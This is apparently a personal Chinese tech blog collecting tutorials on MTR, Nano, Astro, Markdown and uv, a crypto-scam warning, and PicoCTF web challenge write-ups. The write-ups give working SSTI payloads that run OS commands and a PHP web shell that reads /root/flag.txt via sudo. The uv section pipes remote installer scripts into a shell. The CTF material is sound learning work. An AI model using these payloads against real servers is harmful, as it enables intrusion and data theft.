CHIEN 的技術筆記

test

CHIEN (qian) — Tue, 23 Aug 2022 00:00:00 GMT

::::note 你是一名資工系學生，你coding到早上八點，你決定睡覺了。但是你發現被子有點短，於是不斷的調整被子，可不管怎麼調整，被子總是短一截。你終於明白，讀了資工系，你這被子也就這樣了。 ::::

test

$2+2=4$
$2^2=4$

MTR 網路診斷工具完整教學：Linux 網路追蹤與監控指南

CHIEN (qian) — Wed, 01 Nov 2023 00:00:00 GMT

什麼是 MTR？

MTR (My Traceroute) 是一個強大的 Linux 網路診斷工具，它巧妙地結合了 ping 和 traceroute 兩大工具的優點。與傳統的 traceroute 只執行一次路由追蹤不同，MTR 會持續監控網路中的每一個路由節點和每一跳 (hop)，提供即時的網路品質數據，幫助您快速診斷網路問題、分析封包遺失和延遲狀況。

對於網路管理員和系統工程師來說，MTR 是進行網路故障排除的必備工具，能夠清楚呈現從源頭到目標主機之間所有節點的連線狀態。

印象中好像有看過 WinMTR 之類的酷東東（Windows 版本）

~~不是NTR，我第一次聽到這工具的時候聽成ntr~~

~~我還試著apt-get install ntr -y~~

MTR 安裝教學（Ubuntu/Debian）

在 Ubuntu 或 Debian 系統上安裝 MTR 非常簡單，只需要一行指令：

apt-get install mtr -y

安裝完成後，就可以立即開始使用 MTR 進行網路診斷了。

MTR 基礎使用方法與指令範例

最簡單的用法

執行 MTR 最基本的方式就是直接指定目標 IP 或網域：

$ mtr 1.1.1.1

執行後，您會看到類似下方的輸出畫面。MTR 會即時顯示路由路徑、封包遺失率 (Loss%)、已傳送封包數 (Snt)、最後一次延遲 (Last)、平均延遲 (Avg)、最佳延遲 (Best)、最差延遲 (Wrst) 等詳細的網路診斷資訊。

指定 IPv4 或 IPv6 協定

您可以使用 -4 或 -6 參數來強制 MTR 使用特定的 IP 協定版本：

# 強制使用 IPv4
mtr 1.1.1.1 -4

# 強制使用 IPv6
mtr cloudflare.com -6

同時顯示網域名稱與 IP 位址

使用 -b 參數可以讓 MTR 同時顯示每個節點的網域名稱和 IP 位址，方便識別路由經過的網路設備：

mtr cloudflare.com -b

僅顯示 IP 位址（不解析網域名稱）

如果您想要加快 MTR 的執行速度，或是只想看 IP 位址，可以使用 -n 參數跳過 DNS 反向解析：

mtr -n cloudflare.com

設定 Ping 次數上限

使用 -c 參數可以限制 MTR 的 ping 測試次數。當 Snt 欄位達到指定數字後，MTR 會自動結束並顯示統計結果：

mtr 1.1.1.1 -c 6

這個參數在需要快速測試或自動化腳本中特別有用。

MTR 結果匯出與報告生成

將結果匯出為文字檔

有時候我們需要將 MTR 的測試結果保存下來，用於報告撰寫、與同事分享或是向老闆呈現網路狀況（或是炫耀直連 Google 的低延遲！）。

使用 -r 參數配合輸出重導向，就能將結果儲存為文字檔：

mtr 1.1.1.1 -r > owo.txt -c 6

上述指令的意思是：

追蹤到 1.1.1.1 的路由
使用報告模式 (-r)
輸出到當前目錄下的 owo.txt 檔案
限制測試 6 次後自動結束 (-c 6)

匯出後的 owo.txt 內容範例如下：

使用 TCP 或 UDP 協定進行測試

預設情況下，MTR 使用 ICMP 封包進行測試。但某些網路環境可能會封鎖 ICMP，此時您可以改用 TCP 或 UDP 協定：

# 使用 TCP 協定
mtr 1.1.1.1 --tcp

# 使用 UDP 協定
mtr 1.1.1.1 --udp

這在診斷防火牆問題或特定協定的網路路徑時非常有用。

指定來源 IP 位址

如果您的系統有多個網路介面或 IP 位址，可以使用 -a 參數指定從哪個 IP 發送測試封包：

mtr -a <來源IP> 目標主機

MTR 使用技巧總結

MTR 是網路診斷的瑞士刀，結合了 ping 的持續監控和 traceroute 的路由追蹤功能。掌握 MTR 能讓您：

快速定位網路問題：清楚看到哪個節點出現封包遺失或高延遲
持續監控網路品質：即時觀察網路狀態變化
生成專業報告：匯出詳細數據供分析或呈報

何時使用 MTR？

網站或服務出現間歇性連線問題
需要追蹤網路封包的完整路徑
診斷特定節點的網路品質
比較不同時段的網路狀況

MTR vs 其他工具

vs Ping：MTR 提供完整路由路徑資訊，而不只是終點主機的延遲
vs Traceroute：MTR 持續監控並提供統計數據，traceroute 只執行一次
vs Pathping (Windows)：MTR 在 Linux 環境下更輕量且即時性更好

延伸閱讀

想了解更多關於 MTR 和網路診斷的知識嗎？推薦以下資源：

Better Nano: 讓你的 Nano 編輯器更好用 (優化腳本推薦)

CHIEN (qian) — Mon, 06 May 2024 00:00:00 GMT

前言：為什麼需要優化 Nano？

對於許多 Linux 使用者和系統管理員來說，Nano 是最常接觸的文字編輯器之一。它輕量、簡單，且幾乎預裝在所有的 Linux 發行版中。然而，預設的 Nano 功能較為陽春，缺乏語法高亮、行號顯示等現代編輯器常見的功能，這在編輯程式碼或設定檔時可能會降低效率。

這篇文章要介紹一個由 OsGa 開發的 better-nano 優化腳本，它能一鍵升級你的 Nano 使用體驗。

Better Nano 的主要功能

這個腳本主要針對以下幾個方面進行優化：

外觀優化 (Interface)：
- 開啟 語法高亮 (Syntax Highlighting)：讓程式碼和設定檔更易於閱讀。
- 顯示 行號 (Line Numbers)：方便除錯和定位特定行數。
- 改善狀態列資訊。
效能與操作 (Performance & Usability)：
- 啟用 滑鼠支援：允許使用滑鼠游標移動插入點（視終端機支援而定）。
- 優化縮排設定 (Tab/Space)。
快捷鍵優化 (Keybindings)：
- 調整部分快捷鍵以符合現代操作習慣（具體細節視腳本版本而定）。

如何安裝

安裝過程非常簡單，只需要一行指令即可完成。

步驟 1：取得腳本

你可以前往 GitHub 專案頁面查看詳細資訊： 👉 前往 GitHub: osga24/better_nano

步驟 2：執行安裝

通常這類腳本會需要 git clone 下來後執行安裝檔。

git clone https://github.com/osga24/better_nano.git
cd better_nano
chmod +x install.sh
./install.sh

[!WARNING] 注意事項：執行此腳本可能會要求輸入 sudo 密碼，因為它需要修改系統層級或使用者層級的 Nano 設定檔（如 /etc/nanorc 或 ~/.nanorc）。請確保你信任來源程式碼再執行。

結語

透過 better-nano，你可以保留 Nano 的輕量優勢，同時獲得接近 IDE 的視覺體驗。如果你是 Vim 或 Emacs 的苦手，但又需要比預設 Nano 更強大的功能，這個腳本絕對值得一試。

感謝 OsGa 開發此工具。 ||請不要扁我||

有人自己洩漏註記詞?

CHIEN (qian) — Sat, 19 Oct 2024 00:00:00 GMT

自己洩漏註記詞?

有時候會在一些社交平台看到，有人發文說不完合約或是crypto了，剩下1000U或是幾百說要送人，又或者是說不知道怎麼轉移USDT到幣安、OKX等交易所，想請你幫忙這時候你可能會想說，這白癡是不是自己洩漏了註記詞，或是私鑰，然後想要把錢轉移出去，但是不知道怎麼操作，所以才會發文求助，但是

:::rabbit 當你想把錢轉出去時，你才是真正的白癡 :::

但是但是當你要轉USDT出去時你會發現他說Gas Fee不夠需要先支付一點trx進錢包，當你把錢轉入之後他會馬上轉走就算你動作再快也沒有用，因為通常會有多簽或是智能合約。

原理

他可能使用了多簽功能，多簽功能是指一個錢包需要進行交易或是任何動作時需要多個人或是錢包同意，才可以轉錢或是進行任何動作，這樣可以增加安全性，有許多使用到加密貨幣的大企業或是多個持有者的錢包會使用到
當你要把錢轉出時會需要一個簽名的動作，這個動作需要支付Gas Fee，但是就算你轉了一點trx進去，你也沒有辦法進行簽名，因為你不是多簽的其中一個持有者，所以你的錢就會被騙走有時候不一定是多簽，也可能是智能合約。

解決方法

哭一下被騙了，下次不要再一次

結論

這是一個弱智小騙局，但是老實說殺傷力也不大，最多就是騙一點Gas Fee，但是如果你真的被騙了，也只能說你自己太貪心了，不過這也是一個提醒，不要隨便洩漏自己的註記詞或是私鑰，不然你的錢真的就會被轉走
在web3錢包中，記住詞跟私鑰就是你的一切，請不要給任何人不管是你的好友或是你的家人，除非你真的信任他們。

PicoCTF Web Exploitation Easy分級解題紀錄

CHIEN (qian) — Sat, 19 Apr 2025 00:00:00 GMT

Introduction

這是拿來放一些解題ㄉ紀錄，慢慢邊做邊寫，因為我好久沒碰了有些有有些沒有是因為有些我已經解過ㄌ，我也懶得再解一次

SSTI1

Description

SSTI (Server-Side Template Injection) 是一種網頁應用程式漏洞，當使用者輸入的資料被直接嵌入到伺服器端模板中時，就會發生這種漏洞。這可能導致攻擊者能夠執行任意的程式碼或命令，從而獲取敏感資訊或控制伺服器。

解法

首先你會看到一個酷酷的網站，有一個輸入框，你會發現不論輸入啥他都會顯示在頁面上，我們可以試試看輸入{{7*7}} 會得到什麼 <img src="https://i.imgur.com/mbFg62p.png" width="300" height="200" /> 沒錯!一個大大的49，這就是一個SSTI的漏洞，這個漏洞可以讓我們執行python的程式碼，接下來我們可以試試看{{7*7*7*7}} 會得到什麼這時我們已經確定這是一個SSTI的漏洞了，接下來我們可以來點更有趣的東西，他可以執行python的程式碼，因此應該可以執行一些系統命令

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

這段程式碼大概的意思是

request.application: 訪問當前Web請求的應用
__globals__: 訪問全局命名空間，允許獲取內建函式
__import__('os'): 動態導入 os 模塊，這樣就可以使用操作系統相關功能
popen('id'): 執行系統命令 id，該命令顯示當前用戶的身份
read(): 讀取命令的輸出結果
那我們可以把命令改成，ls來看看有沒有什麼驚喜，聽話讓我看看!

{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}

最後只要試試看

python
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}

我們就會得到flag了!
picoCTF{||幹嘛，你要自己去試試看阿!還想偷看阿hhhhhhhhhhhhhhh||}

Cookie Monster Secret Recipe

Description

Cookie ~~小餅乾~~ 是網站儲存在你瀏覽器中的小型資料，用來記住你的登入狀態、偏好設定或追蹤行為。下次你再訪問網站時，瀏覽器會自動帶上這些資訊，讓網站知道你是誰。如果 Cookie 使用不當的話，可能會出現資安漏洞或使用者隱私外洩的風險。舉例來說：

登入資訊可能被竊取：如果沒有設定 HttpOnly，攻擊者就有機會透過跨站腳本攻擊（XSS）偷走使用者的登入 Cookie，冒用身分。
使用者操作被偽造：若網站沒有防範 CSRF 攻擊，攻擊者可以利用使用者的 Cookie 發出未經授權的操作，例如轉帳或修改帳號資料。
敏感資料曝光：若在 Cookie 中儲存像是帳號、密碼、信用卡號等敏感資料，可能會被竊取或洩漏，造成重大安全問題。
跨站追蹤問題：若使用第三方 Cookie，可能被廣告商用來追蹤使用者在不同網站的行為，侵犯個人隱私。
資料被中途攔截：如果 Cookie 沒有設定 Secure，在未加密的 HTTP 傳輸過程中就可能被攔截。因此，開發者在設計網站時必須謹慎使用 Cookie，避免成為資安漏洞的來源。

解法

首先我們看到網站，並且檢查F12->儲存空間->Cookies看看裡面有沒有東西，啥都沒有
我們可以嘗試登入一下，帳號密碼隨意，哎呀看起來有問題我們可以再看一次Cookies，看看有沒有東西看起來有東西出現! 看起來長得有點像是base64編碼的東西，我們可以試試看丟到解碼的網站看看得到答案啦!

FLAG
- ||picoCTF{自己去試試看啦hahahahahahahahha}||

n0s4n1ty 1

Description

這個網站有一個上傳檔案的功能，並且會顯示上傳的檔案名稱和路徑。
有兩個需要注意的地方是未檢查的檔案上傳以及權限設定不當的問題。
這可能會導致攻擊者能夠上傳惡意檔案，並且執行任意的程式碼或命令，從而獲取敏感資訊或控制伺服器。

解法

首先我們看到網站可以上傳檔案，先上傳看看一個php檔案看看譨不能傳PNG以外的東西提示中說要重點針對sudo -l，那我們就嘗試在php中執行看看

<?php echo exec('sudo -l');?>

上傳之後顯示，讓我們去看看uploads/owo.php有甚麼東西

The file owo.php has been uploaded Path: uploads/owo.php

既然可以執行指令那我們就可以嘗試看看root資料夾下面有沒有什麼驚喜

<?php echo exec('sudo ls -al /root ');?>

再次訪問網站並且去到uploads/owo.php會顯示

-rw-r--r-- 1 root root 36 Mar 6 03:56 flag.txt

那我們可以喵喵一下把檔案內容顯示出來!

<?php echo exec('sudo cat /root/flag.txt');?>

哎呀又找到ㄌ

FLAG
- picoCTF{||aaaaaaaaaaa自己去試試看啦||}

head-dump

Description

Heap dump（堆轉儲）是 Java 虛擬機（JVM）在特定時間點的內存快照，常用於診斷內存泄漏和性能問題。然而，若使用不當，可能帶來安全風險
這個題目的面相會是需要注意獲得授權的人員才可以訪問head dump文件，這個文件包含了系統的內存轉儲，可能會洩漏敏感資訊或機密資料。這可能會導致攻擊者能夠獲取敏感資訊或控制伺服器。

解法

首先我們進到網站會先看到這個頁面，題目描述中特別提到API Documentation的文章我們會發現 #API Documentation 可以按下去，並且案下去會進入API的頁面最下方有一個/headdump點開來看看，並且我們可以嘗試戳戳看API嘗試之後會發現他吐了一個200回應給我們並且可以下載dump出來的檔案接下來只要下載下來用記事本打開，但是有好多看不懂的東西怎辦，沒關係這時候只要使用尋找搜尋picoCTF就可以找到flag了!

FLAG
- picoCTF{||自己去試試看啦haskdlfjdisgsdmgzld||}

好好的使用你的Blog!

CHIEN (qian) — Sat, 19 Apr 2025 00:00:00 GMT

客製化你的 Astro Blog

在用了一陣子的 Astro 之後發現我的模板其實有些功能是我想要但是原本沒有的，因此我就嘗試自己動手修改一些功能，這篇文章就是紀錄以及教學如何客製化你的 Blog。

在文章中加入防雷海苔功能

🔧 步驟 1：建立自訂 remark 插件

首先，我們需要讓 Markdown 能夠識別 ||防雷內容|| 的語法。我們會寫一個簡單的 remark 插件，將它轉換為 HTML 的 <span class="spoiler">防雷內容</span>。

在你的專案中建立一個檔案，例如：remarkSpoiler.js（建議放在專案根目錄或 src/plugins/ 目錄中），內容如下：

import { visit } from 'unist-util-visit';

export default function remarkSpoiler() {
  return (tree) => {
    visit(tree, 'text', (node, index, parent) => {
      const regex = /\|\|(.+?)\|\|/g;
      const matches = [...node.value.matchAll(regex)];

      if (matches.length > 0) {
        const newNodes = [];
        let lastIndex = 0;

        for (const match of matches) {
          const [fullMatch, spoilerText] = match;
          const matchStart = match.index;
          const matchEnd = matchStart + fullMatch.length;

          if (matchStart > lastIndex) {
            newNodes.push({
              type: 'text',
              value: node.value.slice(lastIndex, matchStart),
            });
          }

          newNodes.push({
            type: 'html',
            value: `<span class="spoiler">${spoilerText}</span>`,
          });

          lastIndex = matchEnd;
        }

        if (lastIndex < node.value.length) {
          newNodes.push({
            type: 'text',
            value: node.value.slice(lastIndex),
          });
        }

        parent.children.splice(index, 1, ...newNodes);
      }
    });
  };
}

⚙️ 步驟 2：在 Astro 中註冊插件

打開你的 astro.config.mjs，並加上這段：

import { defineConfig } from 'astro/config';
import remarkSpoiler from './src/plugins/remarkSpoiler.js'; // 路徑根據你的檔案位置調整

export default defineConfig({
  markdown: {
    remarkPlugins: [remarkSpoiler],
  },
});

那邊應該會長這樣，直接在最後加上就好：

remarkPlugins: [remarkMath, remarkReadingTime, remarkExcerpt, remarkGithubAdmonitionsToDirectives, remarkDirective, parseDirectiveNode,remarkSpoiler ],

✅ 記得重新啟動 Astro 開發伺服器：pnpm dev

🎨 步驟 3：加入防雷效果的 CSS

在 src/styles/global.css 中加入以下樣式（如果沒有這個檔案，可以自己創一個）：

.spoiler {
  background-color: #000;
  color: transparent;
  border-radius: 4px;
  padding: 0 4px;
  cursor: pointer;
  transition: color 0.3s ease;
}

.spoiler:hover {
  color: #fff;
}

✅ 使用範例

現在，你就可以在 Markdown 檔案中直接使用這樣的語法了：

這是一段正常文字，其中包含 ||這是防雷內容||，滑過才能看到。

渲染後的效果會變成：

這是一段正常文字，其中包含 <span class="spoiler">這是防雷內容</span>，滑過才能看到。

||這是效果||

在頁腳處新增網站存在時間

先看效果

🔧1.先創建時間的組件

新增一個檔案src/components/SiteRuntime.astro

---

const startDate = new Date('2023-01-01') // 替換為您的網站實際上線日期
---

<div id="site-runtime" class="text-sm opacity-75 dark:text-white text-black">
  網站已運行：<span id="runtime-counter">計算中...</span>
</div>

<script>
  function updateRuntime() {
    const startDate = new Date('2023-01-01'); // 替換為您的網站實際上線日期
    const currentDate = new Date();
    

    const timeDiff = currentDate.getTime() - startDate.getTime();
    
    let seconds = Math.floor(timeDiff / 1000);
    let minutes = Math.floor(seconds / 60);
    let hours = Math.floor(minutes / 60);
    let days = Math.floor(hours / 24);
    
    const years = Math.floor(days / 365);
    const months = Math.floor((days % 365) / 30);
    days = days % 30;
    hours = hours % 24;
    minutes = minutes % 60;
    seconds = seconds % 60;
    
    let runtimeText = '';
    
    if (years > 0) {
      runtimeText += `${years} 年 `;
    }
    
    if (months > 0 || years > 0) {
      runtimeText += `${months} 個月 `;
    }
    
    runtimeText += `${days} 天 ${hours} 時 ${minutes} 分 ${seconds} 秒`;
    
    document.getElementById('runtime-counter').textContent = runtimeText;
  }
  
  updateRuntime();
  setInterval(updateRuntime, 1000);
</script>

⚙️2. 在頁腳引入這個組件

可能是在 src\layouts\MainGridLayout.astro中

---
import SiteRuntime from '../components/SiteRuntime.astro';
// 其他導入...
---

<!-- 您的頁腳部分 -->
<footer class="mt-8 py-6 border-t border-gray-200 dark:border-gray-700">
  <div class="container mx-auto px-4">
    <div class="flex flex-col items-center justify-center text-center">
      <div class="mb-2">
        <SiteRuntime />
      </div>
      <div class="text-sm opacity-75 dark:text-white text-black">
      
      </div>
    </div>
  </div>
</footer>

Markdown 完整教學指南:語法、範例與實用技巧一次掌握

CHIEN (qian) — Wed, 23 Jul 2025 00:00:00 GMT

::::note 如果這篇文章有任何缺漏，歡迎指正！ ::::

Markdown 是什麼!

Markdown 是一種輕量級標記語言，它以易讀易寫的純文字格式撰寫文件，並轉換為其他格式！Markdown 的設計理念是：

易讀易寫，讓人可以輕易閱讀並且專注於內容本身。
格式轉換簡單，易於在不同平台之間轉換。
可讀性高，易於閱讀和維護。

Markdown 的使用場景

某些Blog生成器會使用Markdown來撰寫文章
專案的README文件
某些筆記軟體
社交軟體或是一些論壇發文時會用到

Markdown 跟 HTML 的差別

Markdown 比 HTML 更易讀易寫。
Markdown 比 HTML 更易於在不同平台之間轉換。
Markdown 比 HTML 更易於閱讀和維護。

語法比較

兩個大標題分別的語法會是

<h1>Hello World</h1>

# Hello World

所以可以很輕易的看出來！ Markdown 對人類來說比 HTML 更易讀易寫!

語法範例！

標題

# 標題1
## 標題2
### 標題3

列表

列表分為無序列表還有有序列表，區別就是有沒有數字順序

無序列表

- 列表1
- 列表2
- 列表3

列表1

有序列表

1. 列表1
2. 列表2
3. 列表3

列表1
列表2

引用

> 引用

引用

連結

[連結](https://www.google.com)

連結

圖片

引用圖片的方式跟連結的方式幾乎一樣，只是前面多了一個驚嘆號

![圖片](https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png)

粗體

**粗體**

粗體

斜體

_斜體_

斜體

刪除線

刪除線在內容的開頭以及結尾各加上兩個波浪符號，請注意不要用到全型

~~刪除線~~

~~刪除線~~

防雷海苔

防雷海苔的語法是在內容的開頭以及結尾各加上兩個 | 符號，請注意不要用到全型

||防雷海苔||

||防雷海苔||

程式碼

程式碼區塊有分兩種，一種是行內程式碼，一種是程式碼區塊

程式碼區塊

```程式語言名稱
程式碼內容
```

print("Hello, World!")

行內程式碼

行內程式碼適合在文字中插入簡短的程式碼片段，使用單個反引號包圍：

`行內程式碼`

行內程式碼

表格

表格稍微複雜一點，但是只要記住格式就很簡單了

基本表格

| 標題1 | 標題2 | 標題3 |
| ----- | ----- | ----- |
| 內容1 | 內容2 | 內容3 |

標題1	標題2	標題3
內容1	內容2	內容3

表格對齊

| 左對齊 | 置中對齊 | 右對齊 |
| :----- | :------: | -----: |
| 內容   |   內容   |   內容 |

左對齊	置中對齊	右對齊
內容	內容	內容

分隔線

---

任務列表

- [ ] TODO1
- [x] TODO2

[ ] TODO1
[x] TODO2

嵌套列表

列表可以有多層嵌套，使用縮排來表示層級：

1. 第一層項目
   - 第二層項目
   - 第二層項目
     - 第三層項目
2. 第一層項目
   1. 第二層數字項目
   2. 第二層數字項目

效果：

第一層項目
- 第二層項目
- 第二層項目
  - 第三層項目
第一層項目
1. 第二層數字項目
2. 第二層數字項目

數學公式

本網站支援 LaTeX 數學公式，使用 KaTeX 渲染：

行內公式

$E = mc^2$

效果： $E = mc^2$

區塊公式

$$
\sum_{i=1}^{n} x_i = x_1 + x_2 + \cdots + x_n
$$

效果： $$ \sum_{i=1}^{n} x_i = x_1 + x_2 + \cdots + x_n $$

換行

Markdown 中有幾種換行方式：

段落換行

第一段

第二段（中間空一行）

強制換行

第一行（行末加兩個空格）  
第二行

或使用 HTML 標籤：
第一行<br>第二行

效果： 第一行（行末加兩個空格）
第二行

或使用 HTML 標籤：第一行<br>第二行

轉義字符

想要顯示 Markdown 特殊字符本身時，使用反斜線轉義：

\* 這不會變成列表
\# 這不會變成標題
\` 這不會變成程式碼
\[不會變成連結\]
\**不會變成粗體\**

效果：
* 這不會變成列表
# 這不會變成標題
` 這不會變成程式碼
[不會變成連結]
*不會變成粗體*

uv 完全指南：極速 Python 套件與專案管理工具。

CHIEN (qian) — Mon, 24 Nov 2025 00:00:00 GMT

uv：極速 Python 套件與專案管理工具

:::tip 已經在使用 uv 了嗎？
如果你只是忘記在某些場景下該怎麼下命令，可以直接跳到常見場景章節快速查找！如果是忘記指令怎麼下，請直接跳到常用命令速查章節快速查找！ :::

什麼是 uv？

uv 是一個用 Rust 編寫的極速 Python 包和專案管理器，由 Astral 開發（也就是創造了超快 Python Linter Ruff 的那個團隊！）。

簡單來說，uv 就是一個超級快速的 Python 工具，並且下載套件時支援多線程下載，可以幫你管理：

📦 Python 套件（取代 pip）
🗂️ 專案依賴（取代 poetry）
🔧 開發工具（取代 pipx）
🐍 Python 版本（取代 pyenv）
🌐 虛擬環境（取代 virtualenv）

號稱比傳統的 pip 快 10-100 倍！

安裝 uv

macOS / Linux

使用官方獨立安裝程式：

$ curl -LsSf https://astral.sh/uv/install.sh | sh

Windows

使用 PowerShell：

PS> powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"

其他安裝方式

uv 也可以通過以下方式安裝：

# 使用 pip
pip install uv

# 使用 Homebrew (macOS)
brew install uv

# 使用 pipx
pipx install uv

安裝完成後，可以執行以下命令確認安裝成功：

$ uv --version

專案管理

uv 可以管理專案依賴項和環境，支援鎖文件、工作區等，類似於 poetry 或 rye。

創建新專案

$ uv init example
Initialized project `example` at `/home/user/example`

$ cd example

添加依賴

$ uv add ruff
Creating virtual environment at: .venv
Resolved 2 packages in 170ms
Built example @ file:///home/user/example
Prepared 2 packages in 627ms
Installed 2 packages in 1ms
  + example==0.1.0 (from file:///home/user/example)
  + ruff==0.5.4

運行程式

$ uv run ruff check
All checks passed!

鎖定依賴

$ uv lock
Resolved 2 packages in 0.33ms

同步環境

$ uv sync
Resolved 2 packages in 0.70ms
Audited 1 package in 0.02ms

腳本管理

uv 可以管理單文件腳本的依賴項和環境，這對於快速編寫小工具非常有用！

創建腳本並添加依賴

$ echo 'import requests; print(requests.get("https://astral.sh"))' > example.py

$ uv add --script example.py requests
Updated `example.py`

這會在 example.py 頂部添加內聯元數據來聲明依賴。

運行腳本

$ uv run example.py
Reading inline script metadata from: example.py
Installed 5 packages in 12ms
<Response [200]>

uv 會自動創建隔離的虛擬環境來運行腳本，不會污染全局環境！

工具管理

uv 可以執行和安裝由 Python 包提供的命令行工具，類似於 pipx。

臨時運行工具

使用 uvx（uv tool run 的別名）在臨時環境中運行工具：

💡 什麼是臨時環境？
臨時環境是指 uv 會為這個工具創建一個獨立的虛擬環境，運行完畢後就會自動清理，不會在你的系統中留下任何痕跡。這樣你就可以快速試用工具，而不用擔心污染系統環境或與其他套件版本衝突！

$ uvx pycowsay 'hello world!'
Resolved 1 package in 167ms
Installed 1 package in 9ms
  + pycowsay==0.0.0.2
  ------------
< hello world! >
  ------------
   \   ^__^
    \  (oo)\_______
       (__)\       )\/\
           ||----w |
           ||     ||

安裝工具

$ uv tool install ruff
Resolved 1 package in 6ms
Installed 1 package in 2ms
  + ruff==0.5.4
Installed 1 executable: ruff

$ ruff --version
ruff 0.5.4

Python 版本管理

uv 可以安裝 Python 並允許在版本之間快速切換，取代 pyenv 的功能。

安裝多個 Python 版本

$ uv python install 3.10 3.11 3.12
Searching for Python versions matching: Python 3.10
Searching for Python versions matching: Python 3.11
Searching for Python versions matching: Python 3.12
Installed 3 versions in 3.42s
  + cpython-3.10.14-macos-aarch64-none
  + cpython-3.11.9-macos-aarch64-none
  + cpython-3.12.4-macos-aarch64-none

創建指定版本的虛擬環境

$ uv venv --python 3.12.0
Using CPython 3.12.0
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate

運行特定 Python 版本

$ uv run --python pypy@3.8 -- python
Python 3.8.16 (a9dbdca6fc3286b0addd2240f11d97d8e8de187a, Dec 29 2022, 11:45:30)
[PyPy 7.3.11 with GCC Apple LLVM 13.1.6 (clang-1316.0.21.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>>>

固定專案 Python 版本

在當前目錄中使用特定的 Python 版本：

$ uv python pin 3.11
Pinned `.python-version` to `3.11`

這會創建一個 .python-version 文件，uv 會自動使用這個版本。

pip 兼容接口

如果你已經習慣使用 pip，uv 提供了兼容的命令，讓你無縫遷移！

創建虛擬環境

$ uv venv
Using CPython 3.12.3
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate

關閉虛擬環境

$ uv venv deactivate

編譯需求文件

將需求編譯為平台無關的需求文件：

$ uv pip compile requirements.in \
    --universal \
    --output-file requirements.txt
Resolved 43 packages in 12ms

安裝套件

$ uv pip install requests
Resolved 5 packages in 12ms
Installed 5 packages in 23ms
  + certifi==2024.7.4
  + charset-normalizer==3.3.2
  + idna==3.7
  + requests==2.32.3
  + urllib3==2.2.2

同步需求

$ uv pip sync requirements.txt
Resolved 43 packages in 11ms
Installed 43 packages in 208ms
  + babel==2.15.0
  + black==24.4.2
  + certifi==2024.7.4
  ...

常用命令速查

功能	uv 命令	傳統工具
創建專案	`uv init <name>`	-
添加依賴	`uv add <package>`	`poetry add`
移除依賴	`uv remove <package>`	`poetry remove`
安裝套件	`uv pip install <package>`	`pip install`
創建虛擬環境	`uv venv`	`python -m venv`
運行程式	`uv run <command>`	`poetry run`
運行工具	`uvx <tool>`	`pipx run`
安裝工具	`uv tool install <tool>`	`pipx install`
安裝 Python	`uv python install <version>`	`pyenv install`
鎖定依賴	`uv lock`	`poetry lock`
同步環境	`uv sync`	`poetry install`

常見場景

場景 1：分享專案環境給同事

當你開發完一個專案，想要讓同事能夠快速建立相同的環境時：

步驟 1：鎖定依賴

在你的專案目錄中，執行鎖定命令：

$ uv lock
Resolved 25 packages in 0.5ms

這會生成一個 uv.lock 文件，記錄了所有依賴的精確版本。

步驟 2：提交到版本控制

將以下文件提交到 Git：

$ git add pyproject.toml uv.lock
$ git commit -m "Add project dependencies"
$ git push

步驟 3：同事取得專案後

同事只需要執行：

$ git clone <repository-url>
$ cd <project-name>
$ uv sync

這樣就能建立完全相同的開發環境了！✨

場景 2：接手別人的專案

當你拿到一個使用 uv 管理的專案源碼時：

方法 1：使用 uv（推薦）

# 1. 進入專案目錄
$ cd project-name

# 2. 同步環境（會自動創建 .venv 並安裝依賴）
$ uv sync
Resolved 25 packages in 0.70ms
Installed 25 packages in 150ms

# 3. 運行專案
$ uv run python main.py

方法 2：如果專案還有 requirements.txt

# 創建虛擬環境
$ uv venv

# 啟動虛擬環境
$ source .venv/bin/activate  # macOS/Linux
# 或
$ .venv\Scripts\activate     # Windows

# 安裝依賴
$ uv pip install -r requirements.txt

場景 3：確保團隊使用相同的 Python 版本

步驟 1：專案負責人固定 Python 版本

$ uv python pin 3.11
Pinned `.python-version` to `3.11`

這會創建一個 .python-version 文件。

步驟 2：提交 .python-version 到 Git

$ git add .python-version
$ git commit -m "Pin Python version to 3.11"

步驟 3：團隊成員拉取後

$ git pull
$ uv sync

uv 會自動檢查並使用正確的 Python 版本！如果本地沒有，會提示安裝：

$ uv python install

場景 4：更新專案依賴

當你需要更新某個套件版本時：

# 更新單一套件
$ uv add requests@latest

# 或指定版本
$ uv add "requests>=2.31.0"

# 重新鎖定
$ uv lock

# 提交更新
$ git add pyproject.toml uv.lock
$ git commit -m "Update requests to latest version"

團隊成員拉取後執行 uv sync 即可同步更新。

場景 5：CI/CD 環境設定

在 GitHub Actions 或其他 CI/CD 環境中使用 uv：

# .github/workflows/test.yml
name: Test

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Install uv
        run: curl -LsSf https://astral.sh/uv/install.sh | sh
      
      - name: Set up Python
        run: uv python install
      
      - name: Install dependencies
        run: uv sync
      
      - name: Run tests
        run: uv run pytest

這樣就能確保 CI 環境和本地開發環境完全一致！

場景 6：團隊中混用 pip 和 uv

當團隊中有人使用 pip，也有人使用 uv 時，可以透過以下策略協作：

策略 1：同時維護兩種依賴文件

專案同時維護 pyproject.toml 和 requirements.txt，讓兩種工具的使用者都能順利工作：

# 專案結構
project/
├── pyproject.toml      # uv 使用者使用
├── uv.lock            # uv 鎖定文件
└── requirements.txt   # pip 使用者使用

uv 使用者的工作流程：

# 添加新依賴
$ uv add requests

# 生成 requirements.txt 給 pip 使用者
$ uv pip compile pyproject.toml -o requirements.txt

# 提交兩個文件
$ git add pyproject.toml uv.lock requirements.txt
$ git commit -m "Add requests dependency"

pip 使用者的工作流程：

# 拉取更新
$ git pull

# 使用 pip 安裝
$ pip install -r requirements.txt

策略 2：使用 uv 的 pip 兼容模式

pip 使用者也可以使用 uv 的 pip 命令，維持原有的工作流程：

# 使用 uv 的 pip 命令，速度更快：
$ uv pip install -r requirements.txt    # 取代 pip install
$ uv pip freeze > requirements.txt      # 取代 pip freeze
$ uv venv                               # 取代 python -m venv

這樣可以享受 uv 的速度優勢，但維持原有的工作流程！

協作注意事項：

在 README 中說明：清楚記錄團隊使用哪種工具，以及如何安裝依賴。

